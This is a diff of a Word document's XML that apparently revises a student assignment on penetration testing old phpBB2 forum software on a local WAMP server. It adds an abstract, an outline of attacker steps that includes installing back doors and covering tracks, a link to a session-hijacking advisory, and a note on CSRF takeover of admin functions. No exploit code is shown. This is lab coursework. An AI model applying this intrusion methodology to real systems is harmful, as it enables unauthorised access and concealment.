                                 </w:sdtPr>
+                                <w:sdtEndPr/>
                                 <w:sdtContent>
                                   <w:p>
                                     <w:pPr>
@@ -522,10 +453,10 @@
                                   <w:alias w:val="Subtitle"/>
                                   <w:tag w:val=""/>
                                   <w:id w:val="1354072561"/>
-                                  <w:showingPlcHdr/>
                                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                   <w:text/>
                                 </w:sdtPr>
+                                <w:sdtEndPr/>
                                 <w:sdtContent>
                                   <w:p>
                                     <w:pPr>
@@ -541,7 +472,7 @@
                                         <w:sz w:val="24"/>
                                         <w:szCs w:val="24"/>
                                       </w:rPr>
-                                      <w:t>[Document subtitle]</w:t>
+                                      <w:t>PHP Penetration Testing</w:t>
                                     </w:r>
                                   </w:p>
                                 </w:sdtContent>
@@ -574,13 +505,9 @@
                               </w:p>
                               <w:sdt>
                                 <w:sdtPr>
-                                  <w:rPr>
-                                    <w:color w:val="000000" w:themeColor="text1"/>
-                                  </w:rPr>
                                   <w:alias w:val="Abstract"/>
                                   <w:tag w:val=""/>
                                   <w:id w:val="-2036181933"/>
-                                  <w:showingPlcHdr/>
                                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:Abstract[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                                   <w:text/>
                                 </w:sdtPr>
@@ -592,10 +519,25 @@
                                       </w:rPr>
                                     </w:pPr>
                                     <w:r>
-                                      <w:rPr>
-                                        <w:color w:val="000000" w:themeColor="text1"/>
-                                      </w:rPr>
-                                      <w:t>[Draw your reader in with an engaging abstract. It is typically a short summary of the document. When you’re ready to add your content, just click here and start typing.]</w:t>
+                                      <w:t xml:space="preserve">This assignment investigates security vulnerabilities </w:t>
+                                    </w:r>
+                                    <w:r>
+                                      <w:t>with</w:t>
+                                    </w:r>
+                                    <w:r>
+                                      <w:t>in PHP software commonly used for hosting forums from a local WAMP server. A variety of older PHPBB versions and WAMP server are explored to locate and understand security issues</w:t>
+                                    </w:r>
+                                    <w:r>
+                                      <w:t xml:space="preserve"> that could</w:t>
+                                    </w:r>
+                                    <w:r>
+                                      <w:t xml:space="preserve"> be exploited. Methods of these exploits are researched</w:t>
+                                    </w:r>
+                                    <w:r>
+                                      <w:t xml:space="preserve"> and tested in this Document</w:t>
+                                    </w:r>
+                                    <w:r>
+                                      <w:t>.</w:t>
                                     </w:r>
                                   </w:p>
                                 </w:sdtContent>
@@ -613,6 +555,7 @@
                                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                   <w:text/>
                                 </w:sdtPr>
+                                <w:sdtEndPr/>
                                 <w:sdtContent>
                                   <w:p>
                                     <w:pPr>
@@ -630,7 +573,16 @@
                                         <w:szCs w:val="26"/>
                                         <w:lang w:val="en-GB"/>
                                       </w:rPr>
-                                      <w:t>Tommy Bedford</w:t>
+                                      <w:t>Tom</w:t>
+                                    </w:r>
+                                    <w:r>
+                                      <w:rPr>
+                                        <w:color w:val="000000" w:themeColor="text1"/>
+                                        <w:sz w:val="26"/>
+                                        <w:szCs w:val="26"/>
+                                        <w:lang w:val="en-GB"/>
+                                      </w:rPr>
+                                      <w:t xml:space="preserve"> Bedford</w:t>
                                     </w:r>
                                   </w:p>
                                 </w:sdtContent>
@@ -653,6 +605,7 @@
                                     <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns1:category[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                     <w:text/>
                                   </w:sdtPr>
+                                  <w:sdtEndPr/>
                                   <w:sdtContent>
                                     <w:r>
                                       <w:rPr>
@@ -756,7 +709,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc444877079" w:history="1">
+          <w:hyperlink w:anchor="_Toc445123120" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -783,7 +736,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc444877079 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc445123120 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -826,7 +779,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc444877080" w:history="1">
+          <w:hyperlink w:anchor="_Toc445123121" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -853,7 +806,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc444877080 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc445123121 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -891,17 +844,19 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc444877081" w:history="1">
+          <w:hyperlink w:anchor="_Toc445123122" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
                 <w:lang w:val="en"/>
               </w:rPr>
-              <w:t>Reconnaissance</w:t>
+              <w:t>Foot-Printing</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -922,7 +877,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc444877081 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc445123122 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -960,17 +915,19 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc444877082" w:history="1">
+          <w:hyperlink w:anchor="_Toc445123123" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
                 <w:lang w:val="en"/>
               </w:rPr>
-              <w:t>Scanning</w:t>
+              <w:t>Enumeration</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -991,7 +948,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc444877082 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc445123123 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1029,16 +986,19 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc444877083" w:history="1">
+          <w:hyperlink w:anchor="_Toc445123124" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-              </w:rPr>
-              <w:t>Scanning System Vulnerabilities</w:t>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t>Penetration/Attack</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1059,7 +1019,148 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc444877083 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc445123124 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc445123125" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t>Install back doors</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc445123125 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc445123126" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Covering Tracks</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc445123126 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1102,7 +1203,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc444877084" w:history="1">
+          <w:hyperlink w:anchor="_Toc445123127" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1129,7 +1230,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc444877084 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc445123127 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1192,51 +1293,176 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Title"/>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_Toc445123120"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Information Security</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc444877079"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
         <w:t>Introduction</w:t>
       </w:r>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p/>
     <w:p>
+      <w:r>
+        <w:t>The version of WAMP server used in this assignment is WAMP5 1.7.0. The main version of PHPBB focused on in this investigation is phpBB2-2.0.23 although other versions have also been explored.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> A forum has been set up to practice and execute these vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The general </w:t>
+      </w:r>
+      <w:r>
+        <w:t>attacker’s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> methodology is used to find and </w:t>
+      </w:r>
+      <w:r>
+        <w:t>execute</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> software exploits within </w:t>
+      </w:r>
+      <w:r>
+        <w:t>the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> targeted system</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. The methodical steps are listed below</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with </w:t>
+      </w:r>
+      <w:r>
+        <w:t>a brief description of each</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Foot</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>printing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Scan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Enumerate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Penetrate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Cover Tracks</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Install Back Doors</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
         <w:rPr>
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc444877080"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="0"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_Toc445123121"/>
       <w:r>
         <w:rPr>
           <w:color w:val="auto"/>
@@ -1245,7 +1471,6 @@
       </w:r>
       <w:bookmarkEnd w:id="1"/>
     </w:p>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -1254,51 +1479,115 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc444877081"/>
-      <w:r>
-        <w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="0"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t>Reconnaissance</w:t>
+      </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc445123122"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Foot-Printing</w:t>
       </w:r>
       <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:b/>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Tools:</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="8"/>
         </w:numPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>who.is</w:t>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Session Hijacking exploit - </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId9" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en"/>
+          </w:rPr>
+          <w:t>https://cxsecurity.com/issue/WLB-2009090082</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>possibility</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of the attacker carrying out CSRF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(Cross Site Request Forgery) and gaining control of admin </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>functionality</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1306,27 +1595,58 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="8"/>
         </w:numPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>w3dt.net</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:ind w:left="45"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>OS Based Tools:</w:t>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>An analysis of the forum was carried using who.is</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. This </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>delivered details of DNS and IP address details.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Other details such as security updates and software version expiry.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="3"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId10" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="en"/>
+          </w:rPr>
+          <w:t>http://who.is/whois/http://localhost/phpbb-2.0.23/phpbb2/index.php</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1334,19 +1654,27 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="8"/>
         </w:numPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nslookup</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:spacing w:before="0"/>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
@@ -1355,534 +1683,17 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
-        <w:spacing w:before="0"/>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc444877082"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc445123123"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t>Scanning</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="3"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Accessibility</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Which IP addresses are </w:t>
-      </w:r>
-      <w:r>
-        <w:t>accessible</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>What they are running</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Any obviously open doors</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:after="0"/>
-        <w:ind w:left="405"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:ind w:left="45"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Basics:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Ping the address to see if it’ live.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Scan the ports to see if are any are open</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Google ports numbers to get applications</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Google applications vulnerabilities.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
